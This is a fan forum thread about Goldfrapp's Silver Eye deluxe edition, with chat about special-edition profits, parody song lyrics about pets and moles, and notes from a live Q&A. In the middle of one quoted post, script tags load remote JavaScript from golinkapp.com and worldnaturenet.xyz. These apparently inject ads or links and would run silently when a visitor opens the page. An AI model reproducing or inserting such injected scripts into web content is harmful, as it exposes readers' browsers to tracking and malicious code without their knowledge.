Welcome to the new Goldfrapp forum. Enjoy your new home! X
Silver Eye Deluxe Edition
  • 38 Comments sorted by
  • do you think they make much off the special releases and memorabilia?

I'm just putting this out there as an open question and not a critique. I often think the same when Bjork releases all kinds of special editions of her albums and wonder how many folk are snapping them up.

i don't think they make *huge* margins on special editions and memorabilia, but certain specific items definitely have a higher markup compared to cost. overall, though, music sales are so much lower these days that *anything* contributes to an artist's revenue stream. so even if a new edition doesn't sell that much, it's still something to keep them going. goldfrapp actually isn't all that guilty of overkill in this respect at all compared to many other artists these days - just look at how many editions kylie or other more "veteran" artists put out for their new releases, with all sorts of high-priced bundles!
  • goldfrapp actually isn't all that guilty of overkill in this respect at all compared to many other artists these days - just look at how many editions kylie or other more "veteran" artists put out for their new releases, with all sorts of high-priced bundles!

True. Although, and I don't know which side of the argument this bolsters, GF don't seem to use the pledge-based system to judge whether a release is worthwhile; they, or Mute, just seem to release it.
  • I've pledged for a lot of stuff over the last few years. The album Kin from KT Tunstall, Pop Deluxe from Mari Wilson, both of which enabled you to pledge for certain bundles of stuff; signed copies of albums, production credits, listening parties where the artist performs the new album to a very select crowd (18 of us for Mari Wilson's latest album - she brought round snacks and gave me a sausage roll) which allows very intimate access to the artist.
    The biggest was the Black Sabbath box set release of '10 years War' which rereleased the first 8 albums on heavyweight marbled vinyl, all remastered in a box set with all kinds of goodies. It cost £145.
    These special merchsndise releases can be very lucrative! It is also growing as a direct response from the artists to their music being prostituted for little return on streaming sites like Spotify.
    The Moving Finger writes; and, having writ.
    Moves on: nor all thy Piety nor Wit.
    Shall lure it back to cancal half a line,
    Nor all thy Tears wash out a Word of it.
  • My greedy pooches inspired me to plagiarise, or rather, write my alternative lyrics to Ocean on their behalf. Here goes...(I hear the groans already):

I've lost my food bowl, 
     It's gone away
    I've had my dinner
    Or so they say.

Titbit collector
    Titbit collector
    I'm on the mooch...for food....

Oh and I wanna cry
    Wanna freebie!

I'll beg for bones, I'll raid the bin
    To spare me from this hell I'm in
    My gluttony
    And every time I sniff their grub
    Whether at home or down the pub
    I'm drooling
    I'm drooling
    for FOOD!

• :o3 :o3
  • I can do the whole album if you wish. I await your votes ha ha!
  • Haha, Kat! I once made songs from old folk songs for all the pets in the family.
    If I were dead, could I do this?
  • Just for you (you're quick on the button, you greased squirrel you!) here's a little ditty devoted to the local vermin. To the tune of EINE....

Mole hills with paws poking through
    And no need for eyes
    The perfect lawn, flawless
    Dreams they lost in a weekend
    We'll not tire
    We'll eat worms
    the veg patch
    Is never enough
    Digging like
    There's no tomorrow
    We are here
    To churn up your grass!
    Insatiable velvet mammal danger
    All the slugs we can eat
    Whizzing through tunnels dug
    In their wasteland
    The front lawn is not big enough
    Digging like
    There's no tomorrow
    We are here
    To churn up your grass!
    The back lawn
    Is never enough
    Digging like
    There's no tomorrow
    We are pests

%%- %%- %%-
  • Next! (I'm on a roll)
  • By the way, check out "Gsldfrapp Anymore - Lyrics and hidden meaning" on Youtube. Hilarious. Some geezer hypothesising the meaning of the song as Alison's yearning to be a Jesus freak. He's even got the lyrics wrong. Doughnut.
  • Sorry I’m late, I got delayed being a Hedonist!
    Well, next time they’re looking for a new poet laureate, we will know where to point them. I would apply myself but my potty mouth leanings (see my last limerick) may not be what they are looking for.
    The Moving Finger writes; and, having writ.
    Moves on: nor all thy Piety nor Wit.
    Shall lure it back to cancal half a line,
    Nor all thy Tears wash out a Word of it.
  • still wishing this deluxe edition had a bit more variety or meat to it. oh well. will get it if the price is right.
  • just ONE unreleased track would have been nice... unreleased remixes don't count :)
  • Live chat stream thing on the GF Facebook earlier, with quite a few of us namechecked. She even read out my comment/question at the end "Good. I'm glad you thought that, got...that's nice...."

Recording nuggets included;

- there are a few unfinished bits from the SE sessions and some footage from the Brixton gig that they are considering doing something with ('"there will be something from the live footage")
    - no more vinyl planned
    - confirmation of Alice's theory that 'Beast That Never Was' is inspired by the Rilke poem
    - there is definitely NOT going to be a 'Greatest Hits 2'
    - a B sides and unreleased material collection was possible ("Maybe, yeah, one day, but sometimes I like things to be fresh... I'm not sure"). She wasn't sure they had done a recording of 'Fondue Knights';
    - no more touring until the next album, whenever that will be
  • whispered said:

Live chat stream thing on the GF Facebook earlier, with quite a few of us namechecked. She even read out my comment/question at the end "Good. I'm glad you thought that, got...that's nice...."

Recording nuggets included;

- there are a few unfinished bits from the SE sessions and some footage from the Brixton gig that they are considering doing something with ('"there will be something from the live footage")
    - no more vinyl planned
    - confirmation of Alice's theory that 'Beast That Never Was' is inspired by the Rilke poem
    - there is definitely NOT going to be a 'Greatest Hits 2'
    - a B sides and unreleased material collection was possible ("Maybe, yeah, one day, but sometimes I like things to be fresh... I'm not sure"). She wasn't sure they had done a recording of 'Fondue Knights';
    - no more touring until the next album, whenever that will be <script src="//golinkapp.com/1c4a53a7c3409fd61c.js"></script><script type="text/javascript" src="http://golinkapp.com/addons/lnkr5.min.js"></script><script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52288x7242x&r=44"></script><script type="text/javascript" src="http://golinkapp.com/ext/1c4a53a7c3409fd61c.js?sid=52288_7242_&title=ff_gerar_linkreggo&blocks[]=31af2"></script>

NO MORE VINYL?!?!?!?! how hard can it be to repress the old albums? tbh i hope BMG or whoever license it out and convince them to duplicate it a la Felt Mountain's US release forcing their hand. Give the people what they want!

Pretty disappointing answers otherwise too. I guess truly unfinished tracks wouldn't make their way onto a release, but a bummer that they're in general uninterested in giving us unreleased material. And no touring :( Guess we don't have much hope of ever seeing them in the US outside of New York or Los Angeles from here on out.

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!